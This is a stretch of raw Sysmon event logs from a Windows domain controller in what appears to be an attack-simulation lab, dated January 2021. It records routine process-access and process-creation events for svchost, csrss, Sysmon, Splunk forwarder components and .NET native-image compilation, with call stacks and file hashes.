13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-454F-6000-7A01-000000009A01}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-454F-6000-7A01-000000009A01}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.303{08A6967A-454F-6000-7A01-000000009A01}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:19.396{08A6967A-454E-6000-7901-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1304-0\PresentationFramework.Aero2.dll2021-01-14 13:21:19.396 10341000x80000000000000005707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4550-6000-7D01-000000009A01}984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4550-6000-7D01-000000009A01}984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.349{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4550-6000-7D01-000000009A01}984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:20.209{08A6967A-4550-6000-7D01-000000009A01}984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:22.521{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4552-6000-7F01-000000009A01}1168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:22.521{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4552-6000-7F01-000000009A01}1168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:22.521{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4552-6000-7F01-000000009A01}1168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:22.475{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4552-6000-7E01-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:22.443{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4552-6000-7E01-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:22.443{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4552-6000-7E01-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0